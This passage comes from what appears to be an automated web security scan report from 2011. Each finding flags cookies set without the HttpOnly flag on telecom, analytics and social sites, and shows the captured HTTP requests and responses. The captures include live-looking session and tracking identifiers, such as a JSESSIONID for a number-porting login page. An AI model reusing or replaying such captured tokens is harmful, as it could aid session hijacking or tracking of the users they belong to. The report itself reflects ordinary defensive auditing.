Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://seg.sharethis.com/getSegment.php?purl=http%3A%2F%2Fwww.redskye911.com%2Fe911_products%2F&jsref=http%3A%2F%2Fwww.redskye911.com%2F&rnd=1305162438995
Cookie: UID=7278cea-24.143.206.58-1297260492

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Thu, 12 May 2011 01:07:20 GMT
Connection: close
Set-Cookie: UID=7278cea-24.143.206.58-1297260492; expires=Sat, 11-May-2013 01:07:20 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS


13.25. https://lnp.activationnow.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://lnp.activationnow.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Host: lnp.activationnow.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=qYpFNLnKf9fjDZKSkzRJcC5TnR1f7fVpwYdyvx2Q2sJRqJ1jTZD9!-1217543413; LNP=pabetaptel15p-lnp

Response

HTTP/1.1 404 Not Found
Set-Cookie: LNP=pabetaptel15p-lnp; path=/; expires=Thu, 12-May-2011 02:41:17 GMT
Connection: close
Date: Thu, 12 May 2011 00:50:21 GMT
Content-Length: 1214
Content-Type: text/html
X-Powered-By: Servlet/2.4 JSP/2.0

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Draft//EN">
<HTML>
<HEAD>
<TITLE>Error 404--Not Found</TITLE>
<META NAME="GENERATOR" CONTENT="WebLogic Server">
</HEAD>
<BODY bgcolor="white">
<FONT FACE=He
...[SNIP]...

13.26. https://lnp.activationnow.com/lnp/jsp/logon/login.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://lnp.activationnow.com
Path:   /lnp/jsp/logon/login.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /lnp/jsp/logon/login.jsp;jsessionid=qYpFNLnKf9fjDZKSkzRJcC5TnR1f7fVpwYdyvx2Q2sJRqJ1jTZD9!-1217543413 HTTP/1.1
Host: lnp.activationnow.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LNP=pabetaptel15p-lnp; JSESSIONID=qYpFNLnKf9fjDZKSkzRJcC5TnR1f7fVpwYdyvx2Q2sJRqJ1jTZD9!-1217543413

Response

HTTP/1.1 200 OK
Set-Cookie: LNP=pabetaptel15p-lnp; path=/; expires=Thu, 12-May-2011 02:41:17 GMT
Cache-Control: no-store
Date: Thu, 12 May 2011 00:50:20 GMT
Pragma: no-cache
Content-Length: 6277
Content-Type: text/html; charset=ISO-8859-1
Expires: Wed, 31 Dec 1969 23:59:59 GMT
X-Powered-By: Servlet/2.4 JSP/2.0


<html>
<!--
/*
* @(#)login.jsp 5/1/2001 11:55:44 AM
*
* Copyright 2001-2009 Synchronoss Technologies, Inc. 1525 Valley Center Parkway,
* Bethlehem, Pennsylvania, 18017, U.S.A. All Rights R
...[SNIP]...

13.27. http://metrics.connectedplanetonline.com/b/ss/primediateleph/1/H.22.1/s8270624386612  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://metrics.connectedplanetonline.com
Path:   /b/ss/primediateleph/1/H.22.1/s8270624386612

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/primediateleph/1/H.22.1/s8270624386612?AQB=1&ndh=1&t=11%2F4%2F2011%2019%3A46%3A54%203%20300&ce=UTF-8&ns=pentonmedia&pageName=bss_oss%3Anews%3APurchase%20from%20Evolving%20Systems%20will%20broaden%20Neustar%20numbering%20solutions%20business&g=http%3A%2F%2Fconnectedplanetonline.com%2Fbss_oss%2Fnews%2Fpurchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422%2F&cc=USD&ch=bss_oss&events=event18%2Cevent1&c2=connectedplanetonline.com&c6=article&c7=%2Fbss_oss%2Fnews%2Fpurchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422%2Findex.html&c9=By%20Joan%20Engebretson&c10=Apr%2022%2C%202011%2012%3A42%20PM&c13=Anonymous&c51=did%20not%20bounce&v51=Media%20Visions&c52=Direct%20Traffic&v52=Software%20%26%20Technology%3A%20Electrical%20Components&c53=Direct%20Traffic&v53=10&v54=5065&v55=Birmingham%2C%20AL%20%20%2035210&v56=Not%20Defined&v57=D%3Dch&c58=D%3DpageName&v58=D%3DpageName&v60=D%3DUser-Agent&v61=%2B1&v64=D%3Dc53&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1065&bh=964&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava(TM)%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: metrics.connectedplanetonline.com
Proxy-Connection: keep-alive
Referer: http://connectedplanetonline.com/bss_oss/news/purchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: intro=1; s_pers=%20s_visit%3D1%7C1305163014885%3B%20s_depth%3D1%7C1305163014886%3B%20s_dirL%3D1%7C1305163014889%3B; s_sess=%20s_cc%3Dtrue%3B%20s_cm%3DundefinedDirect%2520LoadDirect%2520Load%3B%20gpb_tdt%3DDirect%2520Traffic%3B

Response

HTTP/1.1 302 Found
Date: Thu, 12 May 2011 00:47:45 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi=[CS]v1|26E59718851D25A3-60000128800E6F4B[CE]; Expires=Tue, 10 May 2016 00:47:45 GMT; Domain=.connectedplanetonline.com; Path=/
Location: http://metrics.connectedplanetonline.com/b/ss/primediateleph/1/H.22.1/s8270624386612?AQB=1&pccr=true&vidn=26E59718851D25A3-60000128800E6F4B&&ndh=1&t=11%2F4%2F2011%2019%3A46%3A54%203%20300&ce=UTF-8&ns=pentonmedia&pageName=bss_oss%3Anews%3APurchase%20from%20Evolving%20Systems%20will%20broaden%20Neustar%20numbering%20solutions%20business&g=http%3A%2F%2Fconnectedplanetonline.com%2Fbss_oss%2Fnews%2Fpurchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422%2F&cc=USD&ch=bss_oss&events=event18%2Cevent1&c2=connectedplanetonline.com&c6=article&c7=%2Fbss_oss%2Fnews%2Fpurchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422%2Findex.html&c9=By%20Joan%20Engebretson&c10=Apr%2022%2C%202011%2012%3A42%20PM&c13=Anonymous&c51=did%20not%20bounce&v51=Media%20Visions&c52=Direct%20Traffic&v52=Software%20%26%20Technology%3A%20Electrical%20Components&c53=Direct%20Traffic&v53=10&v54=5065&v55=Birmingham%2C%20AL%20%20%2035210&v56=Not%20Defined&v57=D%3Dch&c58=D%3DpageName&v58=D%3DpageName&v60=D%3DUser-Agent&v61=%2B1&v64=D%3Dc53&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1065&bh=964&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava(TM)%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1
X-C: ms-4.4.1
Expires: Wed, 11 May 2011 00:47:45 GMT
Last-Modified: Fri, 13 May 2011 00:47:45 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www268
Content-Length: 0
Content-Type: text/plain


13.28. http://metrics.sprint.com/b/ss/sprintuniversalsiteprod/1/H.22.1/s83234283372294  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://metrics.sprint.com
Path:   /b/ss/sprintuniversalsiteprod/1/H.22.1/s83234283372294

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/sprintuniversalsiteprod/1/H.22.1/s83234283372294?AQB=1&ndh=1&t=11%2F4%2F2011%2019%3A46%3A22%203%20300&ce=UTF-8&pageName=SU%20%3A%20SE%20%3A%20ART%20%3A%20case-wh164052-20100420-140547%20-%20Bring%20your%20existing%20number%20to%20Sprint&g=http%3A%2F%2Fsupport.sprint.com%2Fsupport%2Farticle%2FBring_your_existing_number_to_Sprint%2Fcase-wh164052-20100420-140547&r=http%3A%2F%2Fshop2.sprint.com%2Fen%2Fsupport%2Ffaq%2Fwlnp.shtml&cc=USD&ch=Support&server=support.sprint.com&events=event14&h1=Support%7CSU%20%3A%20Services%7CSU%20%3A%20Articles&h2=D%3Dg&c3=Not%20Authenticated&c4=SU%20%3A%20Services&c9=not%20logged-in&v13=D%3Dc40&v14=D%3Dc9&v20=D%3Dc3&c21=case-wh164052-20100420-140547&v29=D%3Dc43&v30=D%3Dch&c40=SU%20%3A%20Articles&c42=Shockwave%20Flash%2010.2%20r154&c43=support.sprint.com&v44=34CE0D747C31107C188BD6527E05D4BF&c45=Support%2BSU%20%3A%20SE%20%3A%20ART%20%3A%20case-wh164052-20100420-140547%20-%20Bring%20your%20existing%20number%20to%20Sprint&c46=7%3A30PM&c47=Wednesday&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1065&bh=964&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava(TM)%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: metrics.sprint.com
Proxy-Connection: keep-alive
Referer: http://support.sprint.com/support/article/Bring_your_existing_number_to_Sprint/case-wh164052-20100420-140547
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=34CE0D747C31107C188BD6527E05D4BF; TLisset=true; s_cc=true; gpv_p37=Support; gpv_p38=SU%20%3A%20SE%20%3A%20ART%20%3A%20case-wh164052-20100420-140547%20-%20Bring%20your%20existing%20number%20to%20Sprint

Response

HTTP/1.1 302 Found
Date: Thu, 12 May 2011 00:46:24 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi=[CS]v1|26E596F005010A07-4000010D201AEE12[CE]; Expires=Tue, 10 May 2016 00:46:24 GMT; Domain=.sprint.com; Path=/
Location: http://metrics.sprint.com/b/ss/sprintuniversalsiteprod/1/H.22.1/s83234283372294?AQB=1&pccr=true&vidn=26E596F005010A07-4000010D201AEE12&&ndh=1&t=11%2F4%2F2011%2019%3A46%3A22%203%20300&ce=UTF-8&pageName=SU%20%3A%20SE%20%3A%20ART%20%3A%20case-wh164052-20100420-140547%20-%20Bring%20your%20existing%20number%20to%20Sprint&g=http%3A%2F%2Fsupport.sprint.com%2Fsupport%2Farticle%2FBring_your_existing_number_to_Sprint%2Fcase-wh164052-20100420-140547&r=http%3A%2F%2Fshop2.sprint.com%2Fen%2Fsupport%2Ffaq%2Fwlnp.shtml&cc=USD&ch=Support&server=support.sprint.com&events=event14&h1=Support%7CSU%20%3A%20Services%7CSU%20%3A%20Articles&h2=D%3Dg&c3=Not%20Authenticated&c4=SU%20%3A%20Services&c9=not%20logged-in&v13=D%3Dc40&v14=D%3Dc9&v20=D%3Dc3&c21=case-wh164052-20100420-140547&v29=D%3Dc43&v30=D%3Dch&c40=SU%20%3A%20Articles&c42=Shockwave%20Flash%2010.2%20r154&c43=support.sprint.com&v44=34CE0D747C31107C188BD6527E05D4BF&c45=Support%2BSU%20%3A%20SE%20%3A%20ART%20%3A%20case-wh164052-20100420-140547%20-%20Bring%20your%20existing%20number%20to%20Sprint&c46=7%3A30PM&c47=Wednesday&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1065&bh=964&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava(TM)%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1
X-C: ms-4.4.1
Expires: Wed, 11 May 2011 00:46:24 GMT
Last-Modified: Fri, 13 May 2011 00:46:24 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www105
Content-Length: 0
Content-Type: text/plain


13.29. http://metrics.vonage.com/b/ss/vonagevonagecomsubscribeprod/1/H.21/s84690568589139  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://metrics.vonage.com
Path:   /b/ss/vonagevonagecomsubscribeprod/1/H.21/s84690568589139

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/vonagevonagecomsubscribeprod/1/H.21/s84690568589139?AQB=1&ndh=1&t=11/4/2011%2019%3A50%3A39%203%20300&ns=vonage&pageName=lp_US_afflpdc_index&g=http%3A//www.vonage.com/lp/US/afflpdc/index.php&r=http%3A//www.vonage-forum.com/forum8.html&cc=USD&ch=US/VDV/Vonagecom&events=event7&h1=US/VDV/Vonagecom&c11=MainSite&v14=http%3A//www.vonage-forum.com/forum8.html&v15=www.vonage-forum.com&v18=Other%20Referrers-www.vonage-forum.com&v19=n/a&v20=Other%20Referrers&v23=Other%20Referrers-www.vonage-forum.com&v44=lp_US_afflpdc_index&c45=3&c46=8%3A30PM&v46=8%3A30PM&c47=Wednesday&v47=Wednesday&c48=Weekday&v48=Weekday&c49=New&v49=New&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1065&bh=964&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: metrics.vonage.com
Proxy-Connection: keep-alive
Referer: http://www.vonage.com/lp/US/afflpdc/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: refer_id=AFLGN090801001W1; LP=1%7E%7E; op471landingpagegum=a03o0bv0lg275ci0432m078ca; op471landingpageliid=a03o0bv0lg275ci0432m078ca; s_cc=true; s_nr=1305161439053-New; gpv_pageName=lp_US_afflpdc_index; s_cm=undefinedwww.vonage-forum.comwww.vonage-forum.com; s_cpmcvp=%5B%5B%27Other%2520Referrers-www.vonage-forum.com%27%2C%271305161439058%27%5D%5D

Response

HTTP/1.1 302 Found
Date: Thu, 12 May 2011 00:50:40 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi=[CS]v1|26E5977005079CA6-60000102A0076E90[CE]; Expires=Tue, 10 May 2016 00:50:40 GMT; Domain=.vonage.com; Path=/
Location: http://metrics.vonage.com/b/ss/vonagevonagecomsubscribeprod/1/H.21/s84690568589139?AQB=1&pccr=true&vidn=26E5977005079CA6-60000102A0076E90&&ndh=1&t=11/4/2011%2019%3A50%3A39%203%20300&ns=vonage&pageName=lp_US_afflpdc_index&g=http%3A//www.vonage.com/lp/US/afflpdc/index.php&r=http%3A//www.vonage-forum.com/forum8.html&cc=USD&ch=US/VDV/Vonagecom&events=event7&h1=US/VDV/Vonagecom&c11=MainSite&v14=http%3A//www.vonage-forum.com/forum8.html&v15=www.vonage-forum.com&v18=Other%20Referrers-www.vonage-forum.com&v19=n/a&v20=Other%20Referrers&v23=Other%20Referrers-www.vonage-forum.com&v44=lp_US_afflpdc_index&c45=3&c46=8%3A30PM&v46=8%3A30PM&c47=Wednesday&v47=Wednesday&c48=Weekday&v48=Weekday&c49=New&v49=New&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1065&bh=964&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1
X-C: ms-4.4.1
Expires: Wed, 11 May 2011 00:50:40 GMT
Last-Modified: Fri, 13 May 2011 00:50:40 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www21
Content-Length: 0
Content-Type: text/plain


13.30. http://nanpa.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nanpa.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: nanpa.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:05:16 GMT
Server: Apache
Accept-Ranges: bytes
Content-Type: text/html
Set-Cookie: BIGipServernas-ns=2886707392.20480.0000; path=/
Content-Length: 11874

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/
...[SNIP]...

13.31. http://nextelonline.nextel.com/tl/set_tl.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nextelonline.nextel.com
Path:   /tl/set_tl.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tl/set_tl.html?34CE0D747C31107C188BD6527E05D4BF HTTP/1.1
Host: nextelonline.nextel.com
Proxy-Connection: keep-alive
Referer: http://support.sprint.com/support/article/Bring_your_existing_number_to_Sprint/case-wh164052-20100420-140547
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Thu, 12 May 2011 00:46:16 GMT
Content-type: text/html
Set-Cookie: TLTSID=3E4B9B467C31107C1E2DA15A0F0D7966; Path=/; Domain=.nextel.com
Content-Length: 1439

<script>
   var cn="TLTSID"; // the cookie name
   var flag="TLisset=true"; // name/value for the "flag" cookie
   // array of domains for different environments (production is last as a catchall)
   // each
...[SNIP]...

13.32. http://pixel.quantserve.com/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /pixel

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel;r=70613911;fpan=0;fpa=P0-487374334-1303349183888;ns=1;url=http%3A%2F%2Fmediacdn.disqus.com%2F1304984847%2Fbuild%2Fsystem%2Fdef.html%23xdm_e%3Dhttp%253A%252F%252Fconnectedplanetonline.com%26xdm_c%3Ddefault3812%26xdm_p%3D1%26;ref=http%3A%2F%2Fconnectedplanetonline.com%2Fbss_oss%2Fnews%2Fpurchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422%2F;ce=1;je=1;sr=1920x1200x16;enc=n;ogl=;dst=1;et=1305161240362;tzo=300;a=p-94WKwgUwZHlfo HTTP/1.1
Host: pixel.quantserve.com
Proxy-Connection: keep-alive
Referer: http://mediacdn.disqus.com/1304984847/build/system/def.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mc=4dab4f93-dea96-f475f-85ff7; d=EL4AJe8kjVmM-5GL0ZmY8frRi58oyBABxQEB3AaBtQCa0aWZVw8Ys9HNGFnDDCAJKLPR1KLMUgsqOEwdP-EQwgDB8QggINIOIAnRO7YKkZLHQxIIILsywStxxIP-FMWRtTqB4eaRAE0gDokgDDAL4tGmog0bEJ0pOUo4sjA

Response

HTTP/1.1 204 No Content
Connection: close
Set-Cookie: d=EN8AJe8kjVmM-5GL0ZmY8frRi58oyBABxQEB3QaB1QCa0aWZVw8Ys9HNGFnDDCAJKLPR1KLMUgsqOEwdP-EQwgDB8QggINIOIAnRO7YKkZLHQxIIILsywStxxIP-FMWRtTqB4eaRAE0gDokgDDAL4tGmog0bEJ0pOUo4sjA; expires=Wed, 10-Aug-2011 00:48:44 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR SAMa IND COM NAV"
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Date: Thu, 12 May 2011 00:48:44 GMT
Server: QS


13.33. http://shop2.sprint.com/en/support/faq/wlnp.shtml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop2.sprint.com
Path:   /en/support/faq/wlnp.shtml

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en/support/faq/wlnp.shtml HTTP/1.1
Host: shop2.sprint.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Thu, 12 May 2011 00:46:00 GMT
Set-Cookie: TLTSID=34E27AE87C31107C188CD6527E05D4BF; Path=/; Domain=.sprint.com
Content-type: text/html
Content-Length: 324

<script type="text/javascript">location.replace('http://support.sprint.com/support/article/Bring_your_existing_number_to_Sprint/case-wh164052-20100420-140547');</script>


<meta http-equiv="refresh" c
...[SNIP]...

13.34. http://tis.org/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tis.org
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: tis.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:43:06 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: COOKIE=10.5.16.243.1305160986882003; path=/
Set-Cookie: referrer=; path=/
Set-Cookie: t=cd7bec407c3011e0b0290015c5e75168; path=/
Set-Cookie: referrer=tis.org; path=/
Set-Cookie: visitorxtis.org=1
Set-Cookie: Template--tis.org=3D_Bars; path=/
Set-Cookie: FeedProvider--tis.org=Google; path=/
Vary: Accept-Encoding,User-Agent
Cartoon: aalander6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29687


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html>
<head>

<title>

tis.org


</tit
...[SNIP]...

13.35. http://twitter.com/javascripts/blogger.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /javascripts/blogger.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /javascripts/blogger.js HTTP/1.1
Host: twitter.com
Proxy-Connection: keep-alive
Referer: http://www.secviz.org/node/89
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=130340348934320043; __utmz=43838368.1303561994.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); js=1; __utma=43838368.551233229.1303561994.1304617828.1304721594.4
If-Modified-Since: Wed, 04 May 2011 17:32:26 GMT

Response

HTTP/1.1 304 Not Modified
Date: Thu, 12 May 2011 00:48:47 GMT
Server: Apache
Connection: close
Expires: Thu, 12 May 2011 00:53:47 GMT
Cache-Control: max-age=300
Vary: Accept-Encoding
Set-Cookie: k=173.193.214.243.1305161327058682; path=/; expires=Thu, 19-May-11 00:48:47 GMT; domain=.twitter.com


13.36. http://twitter.com/statuses/user_timeline/secviz.json  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /statuses/user_timeline/secviz.json

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /statuses/user_timeline/secviz.json?callback=twitterCallback2&count=5 HTTP/1.1
Host: twitter.com
Proxy-Connection: keep-alive
Referer: http://www.secviz.org/node/89
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=130340348934320043; __utmz=43838368.1303561994.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); js=1; __utma=43838368.551233229.1303561994.1304617828.1304721594.4

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:49:03 GMT
Server: hi
Status: 200 OK
X-Transaction: 1305161343-28574-3094
X-RateLimit-Limit: 150
